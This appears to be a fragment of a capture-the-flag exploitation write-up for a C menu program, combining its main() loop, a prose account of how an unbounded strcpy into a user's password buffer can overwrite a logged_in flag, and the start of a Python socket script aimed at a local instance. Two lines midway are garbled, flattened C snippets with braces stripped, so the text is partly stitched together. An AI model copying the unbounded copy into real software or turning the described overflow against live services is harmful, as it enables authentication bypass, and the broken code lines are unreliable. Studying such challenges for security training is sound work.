
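/*
 * Entry point: show the menu in a loop and dispatch on the numeric choice.
 *
 * The loop ends when scanf() fails to convert an integer (EOF or
 * non-numeric input); choice 4 exits the process directly.
 * menu(), register_user(), login() and show_secret() are defined
 * elsewhere in the program.
 *
 * Returns 0 when the loop ends because input could not be read.
 */
int main(void)
{
    /* Disable stdout buffering so each prompt is written as soon as it is printed. */
    setbuf(stdout, NULL);

    while (1) {
        menu();

        int choice;
        /*
         * "%d%*c" converts one integer and discards the single character
         * that follows it (normally the newline). Any result other than
         * exactly one conversion stops the loop.
         */
        if (scanf("%d%*c", &choice) != 1) {
            break;
        }

        switch (choice) {
        case 1:
            register_user();
            break;
        case 2:
            login();
            break;
        case 3:
            show_secret();
            break;
        case 4:
            exit(0);
        default:
            puts("Invalid");
            break;
        }
    }

    return 0;
}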

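strcpy(user->pwd, buf); copies the password without checking its length, so a password in buf that is longer than the destination overflows the buffer that user->pwd points to. By providing an over‑long password we can write past the allocated 0x80 bytes of pwd and reach the logged_in variable located at 0x603200 (example address). The fix is to bound the copy to the 0x80 bytes allocated for pwd and to reject longer input when the password is read.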

typedef struct char *name; char *pwd; user_t; int main(void) setbuf(stdout, NULL); while (1) menu(); int

#define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> int main(void) setbuf(stdout

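def register(s):
    """Register a user through the service's text menu.

    Selects menu option 1, then answers the ``Name: `` and ``Password: ``
    prompts with eight ``A`` bytes and eight ``B`` bytes, each followed by
    a newline.

    s: connected socket-like object; only ``sendall`` is called on it here.
       ``menu`` and ``recvuntil`` are helpers defined elsewhere in the script.
    """
    menu(s)  # presumably consumes the menu text sent by the service; confirm against the helper
    s.sendall(b'1\n')  # option 1 is the registration entry in the service's menu

    recvuntil(s, b'Name: ')  # presumably reads until the prompt has arrived; confirm
    s.sendall(b'A' * 8 + b'\n')

    recvuntil(s, b'Password: ')
    s.sendall(b'B' * 8 + b'\n')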

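# Address of the service the script connects to (loopback: a local test instance).
HOST = "127.0.0.1"
PORT = 1337  # change to the port the service is bound to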